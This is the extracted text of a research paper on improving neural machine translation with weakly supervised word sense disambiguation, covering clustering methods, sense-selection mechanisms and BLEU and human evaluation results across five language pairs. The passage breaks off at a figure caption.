work_z4osyr4lbfg65mntn73iqciy6a ---- Integrating Weakly Supervised Word Sense Disambiguation into Neural Machine Translation Xiao Pu∗ Nuance Communications xiao.pu@nuance.com Nikolaos Pappas Idiap Research Institute nikolaos.pappas@idiap.ch James Henderson Idiap Research Institute james.henderson@idiap.ch Andrei Popescu-Belis HEIG-VD / HES-SO andrei.popescu-belis@heig-vd.ch Abstract This paper demonstrates that word sense disambiguation (WSD) can improve neural machine translation (NMT) by widening the source context considered when modeling the senses of potentially ambiguous words. We first introduce three adaptive cluster- ing algorithms for WSD, based on k-means, Chinese restaurant processes, and random walks, which are then applied to large word contexts represented in a low-rank space and evaluated on SemEval shared-task data. We then learn word vectors jointly with sense vectors defined by our best WSD method, within a state-of-the-art NMT sys- tem. We show that the concatenation of these vectors, and the use of a sense selec- tion mechanism based on the weighted av- erage of sense vectors, outperforms several baselines including sense-aware ones. This is demonstrated by translation on five lan- guage pairs. The improvements are more than 1 BLEU point over strong NMT base- lines, +4% accuracy over all ambiguous nouns and verbs, or +20% when scored manually over several challenging words. 1 Introduction The correct translation of polysemous words re- mains a challenge for machine translation (MT). Although some translation options may be in- terchangeable, substantially different senses of ∗ Work conducted while at the Idiap Research Institute. source words must generally be rendered by dif- ferent words in the target language. Hence, an MT system should identify—implicitly or explicitly— the correct sense conveyed by each occurrence in order to generate an appropriate translation. For instance, in the following sentence from Europarl, the translation of “deal” should convey the sense “to handle” (in French traiter) and not “to cope” (in French remédier, which is wrong): Source: How can we guarantee the system of prior notification for high-risk products at ports that have the necessary facilities to deal with them? Reference translation: Comment pouvons-nous garantir le système de notification préalable pour les produits présentant un risque élevé dans les ports qui disposent des installations nécessaires pour traiter ces produits ? Baseline neural MT: [. . .] les ports qui disposent des moyens nécessaires pour y remédier ? Sense-aware neural MT: [. . .] les ports qui dis- posent des installations nécessaires pour les traiter ? Current MT systems perform word sense disam- biguation implicitly, based on co-occurring words in a rather limited context. In phrase-based statis- tical MT, the context size is related to the order of the language model (often between 3 and 5) and to the length of n-grams in the phrase table (seldom above 5). In attention-based neural MT (NMT), the context extends to the entire sentence, but 635 Transactions of the Association for Computational Linguistics, vol. 6, pp. 635–650, 2018. Action Editor: Eneko Agirre. Submission batch: 8/2018; Published 12/2018. c© 2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. multiple word senses are not modeled explicitly. The implicit sense information captured by word representations used in NMT leads to a bias in the attention mechanism towards dominant senses. Therefore, the NMT decoders cannot clearly iden- tify the contexts in which one word sense should be used rather than another one. Hence, although NMT can use local constraints to translate “great rock band” into French as superbe groupe de rock rather than grande bande de pierre—thus cor- rectly assigning the musical rather than geological sense to “rock”—it fails to do so for word senses that require larger contexts. In this paper, we demonstrate that the explicit modeling of word senses can be helpful to NMT by using combined vector representations of word types and senses, which are inferred from contexts that are larger than that of state-of-the-art NMT systems. We make the following contributions: • Weakly supervised word sense disambigua- tion (WSD) approaches integrated into NMT, based on three adaptive clustering methods and operating on large word contexts. • Three sense selection mechanisms for inte- grating WSD into NMT, respectively based on top, average, and weighted average (i.e., attention) of word senses. • Consistent improvements against baseline NMT on five language pairs: from English (EN) into Chinese (ZH), Dutch (NL), French (FR), German (DE), and Spanish (ES). The paper is organized as follows. In §2, we present three adaptive WSD methods based on k-means clustering, the Chinese restaurant pro- cess, and random walks. In §3, we present three sense selection mechanisms that integrate the word senses into NMT. The experimental details appear in §4, and the results concerning the opti- mal parameter settings are presented in §5, where we also show that our WSD component is compet- itive on the SemEval 2010 shared task. §6 presents our results: The BLEU scores increase by about 1 point with respect to a strong NMT baseline, and the accuracy of ambiguous noun and verb transla- tion improves by about 4%, while a manual eval- uation of several challenging and frequent words shows an improvement of about 20%. A discus- sion of related work appears finally in §7. 2 Adaptive Sense Clustering for MT In this section, we present the three unsupervised or weakly supervised WSD methods used in our experiments, which aim at clustering different oc- currences of the same word type according to their senses. We first consider all nouns and verbs in the source texts that have more than one sense in WordNet, and extract from there the definition of each sense and, if available, the example. For each occurrence of such nouns or verbs in the train- ing data, we use word2vec to build word vectors for their contexts (i.e., neighboring words). All vectors are passed to an unsupervised clustering algorithm, possibly instantiated with WordNet definitions or examples. The resulting clusters can be numbered and used as labels, or their centroid word vector can be used as well, as explained in §3. This approach answers several limitations of previous supervised or unsupervised WSD methods. On the one hand, supervised meth- ods require data with manually sense-annotated labels and are thus limited to typically small sub- sets of all word types—for example, up to one hundred content words targeted in SemEval 20101 (Manandhar et al., 2010) and up to a thousand words in SemEval 2015 (Moro and Navigli, 2015). In contrast, our method does not require labeled texts for training, and applies to all word types with multiple senses in WordNet (e.g., nearly 4,000 for some data sets; see Table 1 later in this paper). On the other hand, unsupervised methods often predefine the number of possible senses for all ambiguous words before clustering their occur- rences, and do not adapt to what is actually ob- served in the data; as a result, the senses are often too fine-grained for the needs of MT, especially for a particular domain. In contrast, our model learns the number of senses for each analyzed ambiguous word directly from the data. 2.1 Definitions and Notations For each noun or verb type Wt appearing in the training data, as identified by the Stanford POS tagger,2 we extract the senses associated to it in WordNet3 (Fellbaum, 1998) using NLTK.4 1www.cs.york.ac.uk/semeval2010_WSI. 2nlp.stanford.edu/software. 3wordnet.princeton.edu/. 4www.nltk.org/howto/wordnet.html. 636 www.cs.york.ac.uk/semeval2010_WSI nlp.stanford.edu/software wordnet.princeton.edu/ www.nltk.org/howto/wordnet.html Specifically, we extract the set of definitions Dt = {dtj|j = 1, . . . ,mt} and the set of examples of use Et = {etj|j = 1, . . . ,nt}, each of them containing multiple words. Most of the senses are accompanied by a definition, but only about half of them also include an example of use. Definitions dtj and examples etj are repre- sented by vectors defined as the average of the word embeddings over all the words constitut- ing them (except stopwords). Formally, these vec- tors are dtj = ( ∑ wl∈dtj wl)/|dtj| and etj = ( ∑ wl∈e′tj wl)/|e′tj|, respectively, where |dtj| is the number of tokens of the definition. Although the entire definition dtj is used to build the dtj vector, we do not consider all words in the example etj, but limit the sum to a fragment e′tj contained in a window of size c centered around the considered word, to avoid noise from long examples. Hence, we divide by the number of words in this win- dow, noted |e′tj|. All of these word vectors wl are pre-trained word2vec embeddings from Google5 (Mikolov et al., 2013). If dim is the dimensional- ity of the word vector space, then all vectors wl, dtj, and etj are in Rdim . Each definition vector dtj or example vector etj for a word type Wt is considered as a center vector for each sense dur- ing the clustering procedure. Turning now to tokens, each word occurrence wi in a source sentence is represented by the av- erage vector ui of the words from its context, that is, a window of c words centered on wi, c being an even number. We calculate the vector ui for wi by averaging vectors from c/2 words before wi and from c/2 words after it. We stop nevertheless at the sentence boundaries, and filter out stopwords before averaging. 2.2 Clustering Word Occurrences by Sense We adapt three clustering algorithms to our needs for WSD applied to NMT. The objective is to cluster all occurrences wi of a given word type Wt, represented as word vectors ui, according to the similarity of their senses, as inferred from the similarity of the context vectors. We compare the algorithms empirically in §5. K-means Clustering. The original k-means al- gorithm (MacQueen, 1967) aims to partition a set of items, which are here tokens w1,w2, . . . ,wn of the same word type Wt, represented through their 5code.google.com/archive/p/word2vec/. embeddings u1,u2, . . . ,un where ui ∈ Rdim . The goal of k-means is to partition (or cluster) these vectors into k sets S = {S1,S2, . . . ,Sk} so as to minimize the within-cluster sum of squared distances to each centroid µi: S = arg min S k∑ i=1 ∑ u∈Si ||u−µi||2 (1) At the first iteration, when there are no clusters yet, the algorithm selects k random points as centroids of the k clusters. Then, at each subsequent itera- tion t, the algorithm calculates for each candidate cluster a new centroid of the observations, defined as their average vector, as follows: µt+1i = 1 |Sti| ∑ uj∈Sti uj (2) In an earlier application of k-means to phrase- based statistical MT, but not neural MT, we made several modifications to the original k-means al- gorithm to make it adaptive to the word senses observed in training data (Pu et al., 2017). We maintain these changes and summarize them briefly here. The initial number of clusters kt for each ambiguous word type Wt is set to the number of its senses in WordNet, either considering only the senses that have a definition or those that have an example. The centroids of the clusters are ini- tialized to the vectors representing the senses from WordNet, either using their definition vectors dtj or their example vectors etj. These initializations are thus a form of weak supervision of the cluster- ing process. Finally, and most importantly, after running the k-means algorithm, the number of clusters for each word type is reduced by removing the clusters that contain fewer than 10 tokens and as- signing their tokens to the closest large cluster. “Closest” is defined in terms of the cosine distance between ui and their centroids. The final number of clusters thus depends on the observed occur- rences in the training data (which are the same data as for MT), and avoids modeling infrequent senses that are difficult to translate anyway. When used in NMT, in order to assign each new token from the test data to a cluster (i.e., to perform WSD), we select the closest centroid, again in terms of cosine distance. Chinese Restaurant Process. The Chinese Restaurant Process (CRP) is an unsupervised 637 code.google.com/archive/p/word2vec/ method considered as a practical interpretation of a Dirichlet process (Ferguson, 1973) for non- parametric clustering. In the original analogy, each token is compared to a customer in a restaurant, and each cluster is a table where customers can be seated. A new customer can choose to sit at a table with other customers, with a probability proportional to the numbers of customers at that table, or sit at a new, empty table. In an appli- cation to multisense word embeddings, Li and Jurafsky (2015) proposed that the probability to “sit at a table” should also depend on the con- textual similarity between the token and the sense modeled by the table. We build upon this idea and bring several modifications that allow for an instantiation with sense-related knowledge from WordNet, as follows. For each word type Wt appearing in the data, we start by fixing the maximal number kt of senses or clusters as the number of senses of Wt in WordNet. This avoids an unbounded number of clusters (as in the original CRP algorithm) and the risk of cluster sparsity by setting a non-arbitrary limit based on linguistic knowledge. Moreover, we define the initial centroid of each cluster as the word vector corresponding either to the definition dtj of the respective sense, or alternatively to the example etj illustrating the sense. For each token wi and its context vector ui the algorithm decides whether the token is assigned to one of the sense clusters Sj to which previous to- kens have been assigned, or whether it is assigned to a new empty cluster, by selecting the option that has the highest probability, which is computed as follows: P ∝   Nj(λ1s(ui,dtj) + λ2s(ui,µj)) if Nj 6= 0 (non-empty sense) γs(ui,dtj) if Nj = 0 (empty sense) (3) In other words, for a non-empty sense, the proba- bility is proportional to the popularity of the sense (number of tokens it already contains, Nj) and to the weighted sum of two cosine similarities s(·, ·): one between the context vector ui of the token and the definition of the sense dtj, and another one between ui and the average context vector of the tokens already assigned to the sense (µj). These terms are weighted by the two hyper-parameters λ1 and λ2. For an empty sense, only the second term is used, weighted by the γ hyper-parameter. Random Walks. Finally, we also consider for comparison a WSD method based on random walks on the WordNet knowledge graph (Agirre and Soroa, 2009; Agirre et al., 2014) available from the UKB toolkit.6 In the graph, senses cor- respond to nodes and the relationships or depen- dencies between pairs of senses correspond to the edges between those nodes. From each input sen- tence, we extract its content words (nouns, verbs, adjectives, and adverbs) that have an entry in the WordNet weighted graph. The method calculates the probability of a random walk over the graph from a target word’s sense ending on any other sense in the graph, and determines the sense with the highest probability for each analyzed word. In this case, the random walk algorithm is PageRank (Grin and Page, 1998), which computes a relative structural importance or “rank” for each node. 3 Integration with Neural MT 3.1 Baseline Neural MT Model We now present several models integrating WSD into NMT, starting from an attention-based NMT baseline (Bahdanau et al., 2015; Luong et al., 2015). Given a source sentence X with words wx, X = (wx1,w x 2, ...,w x T ), the model computes a con- ditional distribution over translations, expressed as p(Y = (wy1,w y 2, ...,w y T ′)|X). The neural net- work model consists of an encoder, a decoder, and an attention mechanism. First, each source word wxt ∈ V is projected from a one-hot word vec- tor into a continuous vector space representation xt. Then, the resulting sequence of word vectors is read by the bidirectional encoder, which con- sists of forward and backward recurrent networks (RNNs). The forward RNN reads the sequence in left-to-right order (i.e., −→ h t = −→ φ ( −→ h t−1,xt)), and the backward RNN reads it right-to-left ( ←− ht =←− φ ( ←− ht+1,xt)). The hidden states from the forward and back- ward RNNs are concatenated at each time step t to form an “annotation” vector ht = [ −→ ht; ←− ht]. Taken over several time steps, these vectors form the “context”—that is, a tuple of annotation vectors C = (h1,h2, ...,hT). The recurrent activation 6ixa2.si.ehu.es/ukb. Strictly speaking, this is the only genuine WSD method, as the two previous ones pertain to sense induction rather than disambiguation. However, for simplicity, we will refer to all of them as WSD. 638 ixa2.si.ehu.es/ukb functions −→ φ and ←− φ are either long short-term memory units (LSTM) or gated recurrent units (GRU). The decoder RNN maintains an internal hidden state zt′. After each time step t′, it first uses the attention mechanism to weight the annotation vec- tors in the context tuple C. The attention mecha- nism takes as input the previous hidden state of the decoder and one of the annotation vectors, and returns a relevance score et′,t = fATT(zt′−1,ht). These scores are normalized to obtain attention scores: αt′,t = exp(et′,t)/ T∑ k=1 exp(et′,k) (4) These scores serve to compute a weighted sum of annotation vectors ct′ = ∑T t=1 αt′,tht, which are used by the decoder to update its hidden state: zt′ = φz(zt′−1,yt′−1,ct′) (5) Similarly to the encoder, φz is implemented as either an LSTM or GRU and yt′−1 is the target- side word embedding vector corresponding to word wy. 3.2 Sense-aware Neural MT Models To model word senses for NMT, we concate- nate the embedding of each token with a vector representation of its sense, either obtained from one of the clustering methods presented in §2, or learned during encoding, as we will explain. In other words, the new vector w′i represent- ing each source token wi consists of two parts: w′i = [wi ; µi], where wi is the word embed- ding learned by the NMT, and µi is the sense em- bedding obtained from WSD or learned by the NMT. To represent these senses, we create two dictionaries, one for words and the other one for sense labels, which will be embedded in a low- dimensional space, before the encoder. We pro- pose several models for using and/or generating sense embeddings for NMT, named and defined as follows. Top Sense (TOP). In this model, we directly use the sense selected for each token by one of the WSD systems above, and use the embeddings of the respective sense as generated by NMT after training. Weighted Average of Senses (AVG). Instead of fully trusting the decision of a WSD sys- tem (even one adapted to MT), we consider all listed senses and the respective cluster centroids learned by the WSD system. Then we convert the distances dl between the input token vector and the centroid of each sense Sl into a normalized weight distribution either by a linear or a logistic normalization: ωj = 1−dj∑ 1≤l≤k dl or ωj = e −d2j∑ 1≤l≤k e −d2 l (6) where k is the total number of senses of token wi. The sense embedding for each token is computed as the weighted average of all sense embeddings: µi = ∑ 1≤j≤k ωjµij (7) Attention-Based Sense Weights (ATT). In- stead of obtaining the weight distribution from the centroids computed by WSD, we also propose to dynamically compute the probability of related- ness to each sense based on the current word and sense embeddings during encoding, as follows. Given a token wi, we consider all the other tokens in the sentence (w1, . . . ,wi−1,wi+1, . . . ,wL) as the context of wi, where L is the length of the sen- tence. We define the context vector of wi as the mean of all the embeddings uj of the words wj, that is, ui = ( ∑ l 6=i ul)/(L− 1). Then, we com- pute the similarity f(ui,µij) between each sense embedding µij and the context vector ui using an additional attention layer in the network, with two possibilities that will be compared empirically: f(ui,µij) = υ T tanh(Wui + Uµij) (8) or f(ui,µij) = u T i Wµij (9) The weights ωj are now obtained through the following softmax normalization: ωj = ef(ui,µij)∑ 1≤l≤k e f(ui,µil) (10) Finally, the average sense embedding is obtained as in Equation (7), and is concatenated to the word vector ui. ATT Model with Initialization of Embed- dings (ATTini ). The fourth model is similar to the ATT model, with the difference that we initial- ize the embeddings of the source word dictionary using the word2vec vectors of the word types, and the embeddings of the sense dictionary using the centroid vectors obtained from k-means. 639 TL Train Dev Test Labels Words Nouns Verbs FR 0.5M 5k 50k 3,910 1,627 2,006 5.3M 4,576 6,003 8,276 3,059 3,876 DE 0.5M 5k 50k 3,885 1,576 1,976 4.5M 3,000 5,172 7,520 1,634 3,194 ES 0.5M 5k 50k 3,862 1,627 1,987 3.9M 4,576 6,003 7,549 2,798 3,558 ZH 0.5M 5K 50K 3,844 1,475 1,915 NL 0.5M 5K 50K 3,915 1,647 2,210 Table 1: Size of data sets used for machine translation from English to five different target languages (TL). FR = French; DE = German; ES = Spanish; ZH = Chinese; NL = Dutch. 4 Data, Metrics, and Implementation Data Sets. We train and test our sense-aware MT systems on the data shown in Table 1: the UN Corpus7 (Rafalovitch and Dale, 2009) and the Europarl Corpus8 (Koehn, 2005). We first exper- iment with our models using the same data set and protocol as in our previous work (Pu et al., 2017), to enable comparisons with phrase-based statistical MT systems, for which the sense of each ambiguous source word was modeled as a factor. Moreover, in order to make a better comparison with other related approaches, we train and test our sense-aware NMT models on large data sets from Workshop on Statistical Machine Transla- tion (WMT) shared tasks over three language pairs (EN/DE, EN/ES, and EN/FR). The data set used in our previous work con- sists of 500k parallel sentences for each language pair, 5k for development and 50k for testing. The data originates from UN for EN/ZH, and from Europarl for the other pairs. The source sides of these sets contain around 2,000 different English word forms (after lemmatization) that have more than one sense in WordNet. Our WSD system gen- erates ca. 3.8K different noun labels and 1.5K verb labels for these word forms. The WMT data sets additionally used in this pa- per are the following ones. First, we use the com- plete EN/DE set from WMT 2016 (Bojar et al., 2016) with a total of ca. 4.5M sentence pairs. In this case, the development set is NewsTest 2013, and the testing set is made of NewsTest 2014 and 7www.uncorpora.org. 8www.statmt.org/europarl. 2015. Second, for EN/FR and EN/ES, we use data from WMT 2014 (Bojar et al., 2014)9 with 5.3M sentences for EN/FR and 3.8M sentences for EN/ES. Here, the development sets are NewsTest 2008 and 2009, and the testing sets are NewsTest 2012 and 2013 for both language pairs. The source sides of these larger additional sets contain around 3,500 unique English word forms with more than one sense in WordNet, and our system generates ca. 8K different noun labels and 2.5K verb labels for each set. Finally, for comparison purposes and model se- lection, we use the WIT3 Corpus10 (Cettolo et al., 2012), a collection of transcripts of TED talks. We use 150K sentence pairs for training, 5K for devel- opment and 50K for testing. Pre-processing. Before assigning sense la- bels, we tokenize all the texts and identify the parts of speech using the Stanford POS tagger.11 Then, we filter out the stopwords and the nouns that are proper names according to the Stanford Name Entity Recognizer.11 Furthermore, we con- vert the plural forms of nouns to their singular forms and the verb forms to infinitives using the stemmer and lemmatizer from NLTK,12 which is essential because WordNet has description entries only for base forms. The pre-processed text is used for as- signing sense labels to each occurrence of a noun or verb that has more than one sense in WordNet. K-means Settings. Unless otherwise stated, we adopt the following settings in the k-means algorithm, with the implementation provided in Scikit-learn (Pedregosa et al., 2011). We use the definition of each sense for initializing the cen- troids, and later compare this choice with the use of examples. We set kt, the initial number of clus- ters, to the number of WordNet senses of each am- biguous word type Wt, and set the window size for the context surrounding each occurrence to c = 8. Neural MT. We build upon the attention- based neural translation model (Bahdanau et al., 2015) from the OpenNMT toolkit (Klein et al., 2017).13 We use LSTM and not GRU. For the proposed ATT and ATTini models, we add an 9We selected the data from different years of WMT be- cause the EN/FR and EN/ES pairs were only available in WMT 2014. 10wit3.fbk.eu. 11nlp.stanford.edu/software. 12www.nltk.org. 13www.opennmt.net. 640 www.uncorpora.org www.statmt.org/europarl wit3.fbk.eu nlp.stanford.edu/software www.nltk.org www.opennmt.net external attention layer before the encoder, but do not otherwise alter the internals of the NMT model. We set the source and target vocabulary sizes to 50,000 and the dimension of word embeddings to 500, which is recommended for OpenNMT, so as to reach a strong baseline. For the ATTini model, because the embeddings from word2vec used for initialization have only 300 dimensions, we randomly pick up a vector with 200 dimen- sions within range [−0.1,0.1] and concatenate it with the vector from word2vec to reach the re- quired number of dimensions, ensuring a fair comparison. It takes around 15 epochs (25–30 hours on Idiap’s GPU cluster) to train each of the five NMT models: the baseline and our four proposals. The AVG model takes more time for training (around 40 hours) because we use additional weights and senses for each token. In fact, we limit the number of senses for AVG to 5 per word type, after ob- serving that in WordNet there are fewer than 100 words with more than 5 senses. Evaluation Metrics. For the evaluation of in- trinsic WSD performance, we use the V -score, the F1-score, and their average, as used for in- stance at SemEval 2010 (Manandhar et al., 2010). The V -score is the weighted harmonic mean of homogeneity and completeness (favoring systems generating more clusters than the reference), and the F1-score measures the classification perfor- mance (favoring systems generating fewer clus- ters). Therefore, the ranking metric for SemEval 2010 is the average of the two. We select the optimal model configuration based on MT performance on development sets, as measured with the traditional multi-bleu score (Papineni et al., 2002). Moreover, to estimate the impact of WSD on MT, we also measure the actual impact on the nouns and verbs that have several WordNet senses, by counting how many of them are translated exactly as in the reference transla- tion. To quantify the difference with the baseline, we use the following coefficient. First, for a cer- tain set of tokens in the source data, we note as Nimproved the number of tokens that are translated by our system with the same token as in the ref- erence translation, but are translated differently by the baseline system. Conversely, we note as Ndegraded the number of tokens that are translated by the baseline system as in the reference, but dif- ferently by our system.14 We use the normalized coefficient ρ = (Nimproved−Ndegraded)/T , where T is the total number of tokens, as a metric to specifically evaluate the translation of words sub- mitted to WSD. For all tables we mark in bold the best score per condition. For MT scores in Tables 5, 7, and 8, we show the improvement over the baseline and its significance based on two confidence levels: either p < 0.05 (indicated with a ‘†’) or p < 0.01 (‘‡’). Any p-values larger than 0.05 are treated as not significant and are left unmarked. 5 Optimal Values of the Parameters 5.1 Best WSD Method Based on BLEU We first select the optimal clustering method and its initialization settings, in a series of experiments with statistical MT over the WIT3 corpus, ex- tending and confirming our previous results (Pu et al., 2017). In Table 2, we present the BLEU and ρ scores of our previous WSD+SMT system for the three clustering methods, initialized with vec- tors either from the WordNet definitions or from examples, for two language pairs. We also pro- vide BLEU scores of baseline systems and of ora- cle ones (i.e., using correct senses as factors). The best method is k-means and the best initialization is with the vectors of definitions. All values of ρ show improvements over the baseline, with up to 4% for k-means on DE/EN. Moreover, we found that random initializations underperform with respect to definitions or exam- ples. For a fair comparison, we set the number of clusters equal either to the number of synsets with definitions or with examples, for each word type, and obtained BLEU scores on EN/ZH of 15.34 and 15.27, respectively—hence lower than 15.54 and 15.41 in Table 2. We investigated earlier (Pu et al., 2017) the effect of the context window surround- ing each ambiguous token, and found with the WSD+SMT factored system on EN/ZH WIT3 data that the optimal size was 8, which we use here as well. 5.2 Best WSD Method Based on V/F1 Scores Table 3 shows our WSD results in terms of V - score and F1-score, comparing our methods (six 14The values of Nimproved and Ndegraded are obtained using automatic word alignment. They do not capture, of course, the intrinsic correctness of a candidate translation, but only its identity or not with one reference translation. 641 Pair Initialization BLEU ρ (%) Baseline Graph CRP k-means Oracle Graph CRP k-means EN/ZH Definitions 15.23 15.31 15.31 15.54 16.24 +0.20 +0.27 +2.25 Examples 15.28 15.41 15.85 +0.13 +1.60 EN/DE Definitions 19.72 19.74 19.69 20.23 20.99 −0.07 −0.19 +3.96 Examples 19.74 19.87 20.45 −0.12 +2.15 Table 2: Performance of the WSD+SMT factored system for two language pairs from WIT3, with three clustering methods and two initializations. System V-score F1-score Average C All Nouns Verbs All Nouns Verbs All Nouns Verbs UoY 15.70 20.60 8.50 49.80 38.20 66.60 32.75 29.40 37.50 11.54 KCDC-GD 6.90 5.90 8.50 59.20 51.60 70.00 33.05 28.70 39.20 2.78 Duluth-Mix-Gap 3.00 2.90 3.00 59.10 54.50 65.80 31.05 29.70 34.40 1.61 k-means+definitions 13.65 14.70 12.60 56.70 53.70 59.60 35.20 34.20 36.10 4.45 k-means+examples 11.35 11.00 11.70 53.25 47.70 58.80 32.28 29.30 35.25 3.58 CRP + definitions 1.45 1.50 1.45 64.80 56.80 72.80 33.13 29.15 37.10 1.80 CRP + examples 1.20 1.30 1.10 64.75 56.80 72.70 32.98 29.05 36.90 1.66 Graph + definitions 11.30 11.90 10.70 55.10 52.80 57.40 33.20 32.35 34.05 2.63 Graph + examples 9.05 8.70 9.40 50.15 45.20 55.10 29.60 26.96 32.25 2.08 Table 3: WSD results from three SemEval 2010 systems and our six systems, in terms of V -score, F1 score, and their average. C = the average number of clusters. The adaptive k-means using definitions outperforms the others on the average of V and F1, when considering both nouns and verbs, or nouns only. The SemEval systems are UoY (Korkontzelos and Manandhar, 2010); KCDC-GD (Kern et al., 2010); and Duluth-Mix-Gap (Pedersen, 2010). lines at the bottom) with other significant systems that participated in the SemEval 2010 shared task (Manandhar et al., 2010).15 The adaptive k-means initialized with definitions has the highest average score (35.20) and ranks among the top systems for most of the metrics individually. Moreover, the adaptive k-means method finds on average 4.5 senses per word type, which is very close to the ground-truth value of 4.46. Overall, we observed that k-means infers fewer senses per word type than WordNet. These results show that k-means WSD is effective and provides competitive per- formance against other weakly supervised alter- natives (CRP or Random Walk) and even against SemEval WSD methods, but using additional knowledge not available to SemEval participants. 5.3 Selection of WSD+NMT Model To compare several options of the WSD+NMT systems, we trained and tested them on a sub- set of EN/FR Europarl (a smaller data set short- ened the training times). The results are shown 15We provide comparisons with more systems from SemEval in our previous paper (Pu et al., 2017). System and settings BLEU Baseline 29.55 TOP 29.63 (+0.08) AVG with linear norm. in Eq. (6) 29.67 (+0.12) AVG with logistic norm. in Eq. (6) 30.15 (+0.60) ATT with NULL label 29.80 (+0.33) ATT with word used as label 30.23 (+0.68) ATTini with uTi Wµij in Eq. (8) 29.94 (+0.39) ATTini with tanh in Eq. (8) 30.61 (+1.06) Table 4: Performance of various WSD+NMT configu- rations on a EN/FR subset of Europarl, with variations with respect to baseline. We select the settings with the best performance (bold) for our final experiments in §6. in Table 4. For the AVG model, the logistic normal- ization in Equation (6) works better than the linear one. For the ATT model, we compared two dif- ferent labeling approaches for tokens that do not have multiple senses: Either use the same NULL label for all tokens, or use the word itself as a label for its sense; the second option appeared to be the best. Finally, for the ATTini model, we compared the two options for the attention function in Equa- tion (8), and found that the formula with tanh is the best. In what follows, we use these settings for the AVG and ATT systems. 642 EN/FR EN/DE EN/ZH EN/ES EN/NL SMT baseline 31.96 20.78 23.25 39.95 23.56 Graph 32.01 (+.05) 21.17 (+.39) 23.47 (+.22) 40.15 (+.20) 23.74 (+.18) CRP 32.08 (+.12) 21.19 (+.41) † 23.55 (+.29) 40.14 (+.19) 23.79 (+.23) k-means 32.20 (+.24) 21.32 (+.54) † 23.69 (+.44) † 40.37 (+.42) † 23.84 (+.26) NMT baseline 34.60 25.80 27.07 44.09 24.79 k-means + TOP 34.52 (−.08) 25.84 (+.04) 26.93 (−.14) 44.14 (+.05) 24.71 (−.08) k-means + AVG 35.17 (+.57) † 26.47 (+.67) † 27.44 (+.37) 45.05 (+.97) ‡ 25.04 (+.25) None + ATT 35.32 (+.72) ‡ 26.50 (+.70) ‡ 27.56 (+.49) † 44.93 (+.84) ‡ 25.36 (+.57) † k-means + ATTini 35.78 (+1.18) ‡ 26.74 (+.94) ‡ 27.84 (+.77) ‡ 45.18 (+1.09) ‡ 25.65 (+.86) ‡ Table 5: BLEU scores of our sense-aware NMT systems over five language pairs: ATTini is the best one among SMT and NMT systems. Significance testing is indicated by † for p < 0.05 and ‡ for p < 0.01. 6 Results We first evaluate our sense-aware models with smaller data sets (ca. 500K lines) for five language pairs with English as source. We evaluate them through both automatic measures and human as- sessment. Later on, we evaluate our sense-aware NMT models with larger WMT data sets to enable a better comparison with other related approaches. BLEU scores. Table 5 displays the perfor- mance of both sense-aware phrase-based and neu- ral MT systems with the training sets of 500K lines listed in Table 1 on five language pairs. Specifically, we compare several approaches that integrate word sense information in SMT and NMT. The best hyper-parameters are those found above, for each of the WSD+NMT combina- tion strategies, in particular the k-means method for WSD+SMT, and the ATTini method for WSD+NMT—that is, the attention-based model of senses initialized with the output of k-means clustering. Comparisons with Baselines. Table 5 shows that our WSD+NMT systems perform consistently better than the baselines, with the largest improve- ments achieved by NMT on EN/FR and EN/ES. The neural systems outperform the phrase- based statistical ones (Pu et al., 2017), which are shown for comparison in the upper part of the table. We compare our proposal to the recent system proposed by Yang et al. (2017), on the 500K-line EN/FR Europarl data set (the differences between their system and ours are listed in §7). We care- fully implemented their model by following their paper, since their code is not available. Using the sense embeddings of the multi-sense skip-gram model (MSSG) (Neelakantan et al., 2014) as they do, and training for six epochs as in their study, our implementation of their model reaches only 31.05 BLEU points. When increasing the train- ing stage until convergence (15 epochs), the best BLEU score is 34.52, which is still below our NMT baseline of 34.60. We also found that the ini- tialization of embeddings with MSSG brings less than 1 BLEU point improvement with respect to random initializations (which scored 30.11 over six epochs and 33.77 until convergence), while Yang et al. found a 1.3–2.7 increase on two dif- ferent test sets. In order to better understand the difference, we tried several combinations of their model with ours. We obtain a BLEU score of 35.02 by replacing their MSSG sense specifica- tion model with our adaptive k-means approach, and a BLEU score of 35.18 by replacing our context calculation method (averaging word em- beddings within one sentence) with their context vector generation method, which is computed from the output of a bi-directional RNN. In the end, the best BLEU score on this EN/FR data set (35.78 as shown in Table 5, column 1, last line) is reached by our system with its best options. Lexical Choice. Using word alignment, we assess the improvement brought by our systems with respect to the baseline in terms of the number of words—here, WSD-labeled nouns and verbs— that are translated exactly as in the reference trans- lation (modulo alignment errors). These numbers can be arranged in a confusion matrix with four values: the words translated correctly (i.e., as in the reference) by both systems, those translated correctly by one system but incorrectly by the other one, and vice versa, and those translated incorrectly by both. Table 6 shows the confusion matrix for our sense-aware NMT with the ATTini model versus 643 Baselines EN/FR EN/ES Correct Incorrect Correct Incorrect WSD+ C. 134,552 17,145 146,806 16,523 NMT I. 10,551 101,228 8,183 58,387 WSD+ C. 124,759 13,408 139,800 11,194 SMT I. 9,676 115,633 7,559 71,346 Table 6: Confusion matrix for our WSD+NMT (ATTini ) system and our WSD+SMT system against their respective baselines (NMT and SMT), over the Europarl test data, for two language pairs. the NMT baseline over the Europarl test data. The net improvement (i.e., the fraction of words improved by our system minus those degraded16) appears to be +2.5% for EN/FR and +3.6% for EN/ES. For comparison, we show the results of the WSD+SMT system versus the SMT baseline in the lower part of Table 6: The improvement is smaller, at +1.4% for EN/FR and +1.5% for EN/ES. Therefore, the ATTini NMT model brings higher benefits over the NMT baseline than the WSD+SMT factored model, although the NMT base- line is stronger than the SMT one (see Table 5). Human Assessment. To compare our systems against baselines, we also consider a human eval- uation of the translation of words with multiple senses (nouns or verbs). The goal is to capture more precisely the correct translations that are, however, different from the reference. Given the cost of the procedure, one evaluator with good knowledge of EN and FR rated the trans- lations of four word types that appear frequently in the test set and have multiple possible senses and translations into French. These words are: deal (101 tokens), face (84), mark (20), and subject (58). Two translations of deal are exemplified in §1. For each occurrence, the evaluator sees the source sentence, the reference translation, and the outputs of the NMT baseline and the ATTini in random order, so that the system cannot be identi- fied. The two translations of the considered word are rated as good, acceptable, or wrong. We sub- mit only cases in which the two translations differ, to minimize the annotation effort with no impact on the comparison between systems. 16Explicitly, improvements are (system-correct & baseline-incorrect) minus (system-incorrect & baseline- correct), and degradations the converse difference. deal face mark subject Candidate 0.0 0.2 0.4 0.6 0.8 1.0 P ro p o rt io n 2 - Good 1 - Acceptable 0 - Wrong Baseline Our method deal face mark subject Candidate 0.0 0.2 0.4 0.6 0.8 1.0 P ro p o rt io n O > B O = B O < B (a) System ratings. (b) Comparative scores. Figure 1: Human comparison 